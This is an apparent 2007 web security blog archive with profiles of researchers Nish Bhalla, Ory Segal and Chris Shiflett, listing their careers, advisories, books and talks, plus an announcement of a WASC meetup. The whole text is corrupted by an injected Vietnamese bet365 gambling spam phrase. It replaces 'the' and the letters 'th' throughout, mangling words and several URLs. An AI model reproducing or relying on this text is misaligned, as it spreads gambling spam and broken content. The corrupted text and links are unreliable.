In 2004 after leaving Foundstone I started Security Compass, which is where I am today. We decided to develop RATS like web code auditing tool; SWAAT (Security Compass Web Application Analysis Tool) to help with doing some basic server page code auditing.

We're currently involved in doing some interesting research on web services and we'll be coming out with interesting web services tools in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 near future.

I'm a big snooker/pool fan; living in Toronto provides me with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 chance to meet a lot of interesting people.”


Based out of Toronto, CA, Nish is 33 years old. Below are his contributions to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 community.


Articles:-

Writing Stack Based Overflows on Windows
http://www.securitycompass.com/resources/StackBasedOverflows-Windows-Part1.pdf
http://www.securitycompass.com/resources/StackBasedOverflows-Windows-Part2.pdf
http://www.securitycompass.com/resources/StackBasedOverflows-Windows-Part3.pdf
http://www.securitycompass.com/resources/StackBasedOverflows-Windows-Part4.pdf

AIX 4.3 Bastion Host Guidelines
http://www.giac.org/certified_professionals/practicals/gsec/0853.php

Building Secure Applications: Consistent Logging
http://www.securityfocus.com/infocus/1888

IIS Lockdown and Urlscan
http://www.securityfocus.com/infocus/1755


Books:-

Co-authored

Buffer Overflow Attacks
http://www.amazon.com/gp/product/1932266674/


Contributed

Hacking Exposed Web Applications, Second Edition
http://www.amazon.com/gp/product/0072262990

HackNotes(tm) Network Security Portable Reference
http://www.amazon.com/gp/product/0072227834/

Windows(R) XP Professional Security
http://www.amazon.com/gp/product/0072226021/

Writing Security Tools and Exploits
http://www.amazon.com/gp/product/1597499978


Conferences:-

Web Service Vulnerabilities
http://www.blackhat.com/html/bh-europe-07/bh-eu-07-index.html

Application Security - Dallascon
http://www.dallascon.com/

Federations of Security Professionals
http://www.fspgroup.ca/

Binary Analysis, Finding Secret in ISAPIs - 2006
http://www.syscan.org/

Preparing for a FISMA Compliancy Audit: What IT Security Professional Needs to Know
http://www.infosecurityevent.com/App/homepage.cfm?moduleid=42&appname=100004

Finding Secrets in ISAPI
http://conference.hackincá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365box.org/hitbsecconf2006kl/

Auditing Source Code
http://2005.recon.cx/


Ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r Contributions:-

OWASP Toronto Local Chapter
http://www.owasp.org/index.php/Toronto

SWAAT
http://www.owasp.org/index.php/Category:OWASP_SWAAT_Project

Yet Anocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r Solaris Security Project
http://www.yassp.org/yassp/


Company working for:-

Security Compass


Email:-

nish__at__securitycompass_dot_com


Website:-

www.securitycompass.com


Companies worked for:-


Foundstone, Infotek Solutions


Education:-

Masters in Parallel Processing from Sheffield University,
Post graduation in Finance from Strathclyde University,
Bachelor in Commerce from Bangalore University



Nish is currently working on some very interesting tools and hopefully will be released soon which are definitely worth evaluating.

Last Week – Ory Segal
Next Week – Andrew Van Der Stock

Monday, April 16, 2007

Reflection on Ory Segal


This week on reflection we have Ory Segal of Watchfire. Ory has been involved in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 webappsec from its very early days. He has published several whitepapers, articles and advisories. He has contributed to security standards like WASC Threat Classification and WASC Firewall Evaluation Criteria. He has spoken at various conferences and security events and is very reputed amongst cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 web application security professionals. Today, he shares with us his journey in web application security field. In his own words

“My involvement in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 security world started back in 1995, when I was hired as a technician for a company that dealt with counter-intelligence. The job was very interesting and included all sorts of things you only see in movies – scanning and locating eavesdropping equipment, installing all sorts of intelligence gadgets for government agencies, etc. (during that time I developed paranoia, and to this day I always search new places I visit for hidden security cams).

When I grew tired of counter-intelligence I made cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 switch over to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Internet which was just emerging here in Israel. I worked for about a year for one of Israel’s biggest ISPs, and I learned all about network security - specifically TCP/IP and Linux. Someone I knew (and who knew what I was doing in my spare time) who worked for a large data security consulting company in Israel asked me to help her build a penetration testing team, which sounded very interesting to me. I cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n spent almost two years building a team of penetration testers that performed risk assessments for almost every major company in Israel, as well as most of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 government offices. As a part of my job, I was managing several large-scale and critical information security projects for clients such as cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Tel Aviv Stock Exchange, Israeli banks and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Israeli Department of Defense.

On one of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 projects I was managing, I was introduced to a very interesting piece of software, which at cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 time was quite innovative – a Web Application Firewall. It was called Clearnet, and was developed by a small company called Perfecto Technologies. The product would later become AppShield, and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 company would later become Sanctum Inc. AppShield was such an interesting and refreshing idea that it got me very intrigued. As part of my role I got cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 chance to try and hack my way through AppShield which was very hard. I did find some minor issues, but never got through… that’s when I really got hooked on web application security. Unlike network-level hacking, which almost always summed up to exploiting some buffer overflow, web application hacking posed a lot more challenges. It was all about bypassing application logic and felt like solving a puzzle.

After a few months I received an offer from Gili Raanan (co-founder of Sanctum) who was in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 process of putting togecá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r a team of security researchers. During my interview I was introduced to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 soon-to-be-famous Amit Klein. Lucky for me, Amit decided to hire me. In cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 end, working with Amit is one of my fondest memories of my years with Sanctum. Amit is a great mentor and I could not have hoped for a better boss, and friend.

My work at Sanctum revolved mostly around AppScan - a new product cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 company was just building. It was cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 first automated web application scanner in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 world. When I started working on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 product, it was just at v1.0, and was built around an HTTP Proxy. It worked by proxying and analyzing HTTP traffic that was created by cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 user who manually browsed through cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 application, and by creating some simple parameter tampering attacks. At that time it did not include cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 sophisticated capabilities that we have all come to expect from AppScan.

As well as performing lots of web application security audits and researching and publishing vulnerabilities, I was also responsible for writing parts of AppScan’s attack engine, creating and maintaining thousands of attacks for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 product’s test database. At cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 time, one of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 biggest challenges for web application scanners was how to automate cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 process of testing and validating web security issues - our group pioneered this field.

When I first started working for Sanctum in 2000, web application security was in its infancy – we had to educate cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 market. It was challenging but very fulfilling. Sanctum created this market space and I was thrilled to be a part of something I knew would only grow in importance. I remember how people who attended presentations I gave looked at me, and how cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir jaws dropped when I would demonstrate simple things like Shopping-Cart manipulations or SQL Injection. Big pieces of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 WebAppSec puzzle were still missing – XSS, Blind SQL Injection, and many ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r techniques were eicá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r not yet know publicly, or known but not taken very seriously. In fact, as you probably know, XSS was disregarded by many during cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 first years after it was discovered – people didn’t take it seriously for a long time.

In 2004 Watchfire acquired Sanctum and I took cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 role of AppShield Product Manager and helped cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 company successfully transition AppShield to F5.

In 2005 I accepted cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 role of Director of Security Research for Watchfire and since cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n I have been a part of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Product Management Group. In this role I am responsible for helping to improve AppScan and to continually find ways to automate more aspects of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 web application security assessment process. In addition, I am also researching new technologies and directions for Watchfire’s products as well as overseeing cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 security research which is now performed by a much larger team of security experts (who recently published cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 “Overtaking Google Desktop” whitepaper).

I am very excited about cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 direction that AppScan and automated scanning has taken in recent years, and I am sure we’ll see some major improvements and interesting new technologies in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 near future. I am also very happy to see that more and more organizations are taking WebAppSec seriously, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 market has come a long way.

In cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 “old days”, we did publish some *nasty* anonymous security advisories. It was fun, but I can’t disclose any more information. Now I am a strong supporter of proper disclosure policies (go RFPolicy!)

Back in 2002, I co-founded a small local group of security experts called 8200.org (it was a takeoff on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 whole 2600.org, and 8200 – an Israeli intelligence army unit, which spawned some of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 greatest minds in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 security industry). We ran several projects, one of which was cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 first WarDriving experiment in Israel. The results were obvious and we got some publicity in local newspapers. Among ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365rs, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 group included Liraz Siri (who performed cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Internet Auditing Project and scanned 36 million servers across cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 internet)

I am a musician, I mainly play guitar. I have been a part of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Tel Aviv Indie Rock scene since 1997. In 1997 I put out a solo record (where I played all instruments), under cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 pseudonym “Wilkesboro Brocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365rs”, since cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n I have been involved in several bands. My current band is called Pits (http://www.myspace.com/pitzmusic), we put out an album in 2005, which got good reviews and we are currently working on our second album. If you happen to be in Tel-Aviv, check out our gig schedule.

I live with my wife Orli, who is also involved in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 IT Security market (Orli worked many years for Check Point, and also co-founded anocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r security start-up). It’s not uncommon to hear us talk about security stuff at home. We are both techies and also fanatic music lovers.”




Based out of Tel Aviv, Israel, Ory is only 33 years old. Below is a list of his contributions to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 community.


Articles:-

Testing Privilege Escalation in Web Applications:
https://www.watchfire.com/securearea/whitepapers.aspx?id=24

Web Application Forensics: The uncharted territory:
http://www.cgisecurity.com/lib/WhitePaper_Forensics.pdf

Methodologies & Tools for Web Application Security Assessment:
https://www.watchfire.com/securearea/whitepapers.aspx?id=20

Ory has also authored a series of web casts on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 subject of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 WASC TC project, covering web application security, advanced hacking courses, and gave numerous presentations around cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 globe on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 subject of Web Application Security. Those links can be found on Watchfire website (Requires personal information).



Advisories:-

Apache Win32 Batch File Remote Command Execution Vulnerability:
http://www.securityfocus.com/bid/4335

Multiple vendors web server source code disclosure - 8.3 name format vulnerability:
http://www.securityfocus.com/archive/1/273308

Macromedia ColdFusion MX Missing Template Cross Site Scripting Vulnerability:
http://www.securityfocus.com/bid/5011/

Microsoft Exchange Server 5.5 Outlook Web Access Cross-Site Scripting Vulnerability:
http://www.securityfocus.com/bid/8832

Multiple XSS vulnerabilities in Microsoft SharePoint Portal Server:
http://www.securityfocus.com/bid/10043

Cpanel Admin Interface HTML Injection Vulnerability:
http://www.securityfocus.com/bid/8119

Microsoft IIS 5.x/6.0 WebDAV (XML parser) attribute blowup DoS (Written by Amit Klein). Helped to apply cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 vulnerability to Microsoft IIS servers:
http://www.securityfocus.com/archive/1/378179

PhpBB HTTP Response Splitting & Cross Site Scripting vulnerabilities:
http://www.securityfocus.com/bid/10753 &
http://www.securityfocus.com/bid/1074

Deerfield VisNetic WebSite Cross Site Scripting Vulnerability:
http://www.securityfocus.com/bid/6369


Tools:-

Ory has been actively developing parts of Watchfire AppScan and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 PowerTools for a long time now, but ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r than that most of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 tools are only used internally in Watchfire.


Contributions:-

MITRE CWE project
http://cwe.mitre.org/

WAFEC
http://www.webappsec.org/projects/wafec/

WASC Threat Classification
http://www.webappsec.org/projects/threat/



Memberships:-

Web Application Security Consortium


Blog:-

http://blog.watchfire.com


Education:-

BA in Computer Science from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Open Univ. of Israel.


Companies worked for:-

YTS Security Systems, Internet Gold, Avnet Data Security, Sanctum, Watchfire


Company working for:-

Watchfire


Email:-

osegal at watchfire dot com


Ory Segal is amongst one of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 respected figures in web application security. I hope he starts his blog soon to share his ideas and thoughts more frequently with us.
Last Week - Chris Shiflett
Next Week – Nish Bhalla

Tuesday, April 10, 2007

WASC Meetup in bay area

Its a beerfest guys. put it on your calendar

Normally we hold WASC Meet-Ups during large conferences (RSA/ BlackHat) where a lot of web application security people are at same place at cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 same time. Around cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 S.F. Bay Area cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re's enough webappsec people that we we no longer need that excuse. So we're going to plan a WASC Meet-Up inviting those in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 local community to drop by. It'll be an informal event, maybe 15-30 people, no presentations or sponsors. Just like minded people sharing food, drinks, and interesting conversation. Simply an opportunity to see people that we only ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365rwise communicate with virtually. Everyone is welcome. Please RSVP to Jeremiah if you plan on coming.

RSVP - contact__at__webappsec_dot_org

Time: Wed, April. 18 @ 6:00pm
Place:The Faultline (Sunnyvale)
http://www.faultlinebrewing.com/
1235 Oakmead Parkway
Sunnyvale, California, 94086
Tel:408/736-2739

See you all cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re!

Friday, April 06, 2007

Reflection on Chris Shiflett



This week on reflection we have Chris Shiflett. One of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 very few people who have been blogging on webappsec for a long time and I am sure is amongst cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 top 10 visited blog on web application security. His knowledge on web application security is tremendous and his blog is a goldmine for people who are looking to learn and understand various types of web application vulnerabilities and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir solutions. He has spoken at numerous conferences, published several articles and even written few books.

Chris shares with us how he got started with web application security field and how he got involved with PHP security consortium. In his own words

“I've been an avid web enthusiast since cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 early 90s, although cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 first couple of years were mostly spent exploring cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 technologies involved, particularly HTTP. Web application security is a natural extension of my ongoing desire to apply creativity to a solid fundamental understanding of technology. I started programming on a Commodore 64 in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 early 80s, but it wasn't until cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 early 90s that I focused my attention on web technologies.

The PHP Security Consortium is a group of people whose focus is educating cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 PHP community about web application security. It began with a simple post on my blog in 2004 requesting assistance with some research I was conducting at cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 time. (I was researching worms that combine XSS and CSRF, an idea later brought to life by cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Myspace worm.) To date, members of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 PHP Security Consortium have written books and articles, spoken at industry-leading PHP and open source conferences, and collaborated on projects like cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 PHP Security Guide and PHPSecInfo. Very little of our work promotes cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 group itself, because our focus is helping people.

I'm an avid soccer fan. Living in New York provides me with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 chance to play with skilled players from all over cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 world, so I spend almost every weekend in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 park. My wife runs marathons and occasionally convinces me to run with her, but I prefer soccer. :-) “



Based out of Brooklyn, NY, USA, Chris is only 30 years old (I cannot believe so many leading people in webappsec field are below 30, which is a very promising sign for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 industry). Below are his contributions to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 webappsec community.


Books:-

Essential PHP Security (O'Reilly, 2005)
http://phpsecurity.org/

HTTP Developer's Handbook (Sams, 2003)
http://shiflett.org/books

Contributions to ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r books

Programming PHP (O'Reilly 2006)
http://www.amazon.com/Programming-PHP-Rasmus-Lerdorf/dp/1565926102

PHP Cookbook (O'Reilly 2006)
http://www.oreilly.com/catalog/phpckbk2/

PHP in Action (Manning, 2007)
http://www.manning.com/reiersol/


Articles (WebAppSec only):-

Note: This is a subset of articles that are at least tangentially
related to web application security.

The articles without cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 link were published in PHP architect magazine and are available only upon subscription. The dates are mentioned along with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 article (in case you want to look up that particular issue of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 magazine). You can also find cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 information on his blog though.

Security Corner: Security Testing - 19 Dec 2006

Security Corner: Cross-Domain Ajax - 16 Oct 2006

Security Corner: Understanding Superglobals - 25 Jul 2006

Security Corner: Character Encoding - 28 Feb 2006

Security Corner: Email Injection - 25 Jan 2006

Security Corner: Context - 22 Dec 2005

Security Corner: Cross-Site Scripting - 21 Nov 2005

Security Corner: HTTP Response Splitting - 25 Oct 2005

Security Corner: Code Audits - 21 Sep 2005

Security Corner: Theory - 18 Jul 2005

Security Corner: Persistent Logins - 25 May 2005

Security Corner: BBCode - 19 Apr 2005

Security Corner: Magic Quotes - 21 Mar 2005

Security Corner: PHP Security Consortium - 15 Feb 2005

Guru Speak: Storing Sessions in a Database
http://shiflett.org/articles/storing-sessions-in-a-database

Security Corner: Cross-Site Request Forgeries
http://shiflett.org/articles/cross-site-request-forgeries

Security Corner: Ideology
http://shiflett.org/articles/ideology

Guru Speak: How to Avoid "Page Has Expired" Warnings
http://shiflett.org/articles/how-to-avoid-page-has-expired-warnings

Security Corner: File Uploads
http://shiflett.org/articles/file-uploads

Security Corner: Secure Design
http://shiflett.org/articles/secure-design

Security Corner: Session Hijacking
http://shiflett.org/articles/session-hijacking

Security Corner: Form Spoofing
http://shiflett.org/articles/form-spoofing

Security Corner: Input Filtering
http://shiflett.org/articles/input-filtering

Security Corner: SQL Injection
http://shiflett.org/articles/sql-injection

Security Corner: Shared Hosting
http://shiflett.org/articles/shared-hosting

Security Corner: Session Fixation
http://shiflett.org/articles/session-fixation

The Truth about Sessions
http://shiflett.org/articles/cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365-truth-about-sessions

Foiling Cross-Site Attacks
http://shiflett.org/articles/foiling-cross-site-attacks

Passport Hacking Revisited
http://shiflett.org/articles/passport-hacking-revisited

Passport Hacking
http://shiflett.org/articles/passport-hacking


Lectures / Talks:-

Almost all of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 below mentioned talks you can find reference on chris’s blog. I tried to get cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 links but everytime i got sidetracked with something on his blog and eventually ran out of time. For cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 links, please check back again later or you can search on this blog (http://shiflett.org)

PHP Under Attack - OSCON (10 Jul 2003)

PHP Attacks and Defense – ApacheCon (19 Nov 2003)

PHP Security - OSCON (26 Jul 2004)

Foiling Cross-Site Attacks - OSCON (29 Jul 2004)

Securing PHP Sessions - OSCON (30 Jul 2004)

PHP Session Security - phpworks (23 Sep 2004)

Testing PHP with Perl - New York PHP (26 Oct 2004)

PHP Security - ApacheCon (14 Nov 2004)

Testing PHP with Perl - ApacheCon (16 Nov 2004)

PHP Security - PHP Quebec (30 Mar 2005)

PHP Security Briefing - PHP Quebec (01 Apr 2005)

PHP Security Briefing - NOAA SecCon (04 May 2005)

PHP Security by Example - phptropics (13 May 2005)

PHP Security Audit HOWTO - PHP West (11 Jun 2005)

PHP Security - ApacheCon Europe (19 Jul 2005)

PHP Security Briefing - ApacheCon Europe (21 Jul 2005)

Testing PHP with Perl - ApacheCon Europe (22 Jul 2005)

PHP Security - OSCON (01 Aug 2005)

PHP Security Briefing - OSCON (03 Aug 2005)

PHP by Example - phpworks (14 Sep 2005)

PHP Security by Example - phpworks (15 Sep 2005)

PHP Security Audit HOWTO - New York PHP (27 Sep 2005)

PHP Security Audit HOWTO - Boston PHP (06 Oct 2005)

PHP Security - ZendCon (18 Oct 2005)

PHP Security Audit HOWTO - ZendCon (21 Oct 2005)

Power PHP Testing - ApacheCon (11 Dec 2005)

Agile PHP Testing - PHP Quebec (31 Mar 2006)

What's New in PHP 5 - LinuxWorld (25 Apr 2006)

PHP Security - LinuxWorld (25 Apr 2006)

PHP Security - phptek (27 Apr 2006)

Zend Framework - Boston PHP (04 May 2006)

Essential PHP Security - ApacheCon Europe (27 Jun 2006)

The Truth about XSS - ApacheCon Europe (28 Jun 2006)

Agile PHP Testing - ApacheCon Europe (29 Jun 2006)

Power PHP Testing - OSCON (24 Jul 2006)

Essential PHP Security - OSCON (25 Jul 2006)

The Truth about XSS - OSCON (26 Jul 2006)

PHP Security Testing - OSCON (27 Jul 2006)

The Truth about XSS - phpworks (13 Sep 2006)

Agile PHP Testing - phpworks (13 Sep 2006)

PHP Security Audit HOWTO - EuroOSCON (21 Sep 2006)

PHP Security Testing - DC PHP Con (19 Oct 2006)

The Truth about XSS - DC PHP Con (19 Oct 2006)

Essential PHP Security - ZendCon (30 Oct 2006)

Security 2.0 - Web Builder 2.0 (05 Dec 2006)

The Truth about Sessions - PHP Quebec (15 Mar 2007)


Memberships:-

PHP Security Consortium (Founder)
http://phpsec.org/

Open Web Application Security Project
http://owasp.org/

Web Application Security Consortium
http://webappsec.org/


Companies worked for:-

USPS, eDonkey, Brain Bulb, OmniTI


Company working for:-

OmniTI (Principal)
http://omniti.com/


Email:-

http://shiflett.org/contact


Blog:-

http://shiflett.org/


Websites:-

Personal -

http://shiflett.org/

Work -

Omni TI
http://omniti.com/

PHP Security Consortium
http://phpsec.org/

Essential PHP Security
http://phpsecurity.org/


Education:-

BS in Computer Science


If you haven’t been to his blog yet, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n I would strongly recommend visiting it sooner as you will find plethora of information on webappsec. Every webappsec enthusiast should have it on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir watchlist.

Last Week - Jeff Willians
Next Week - Ory Segal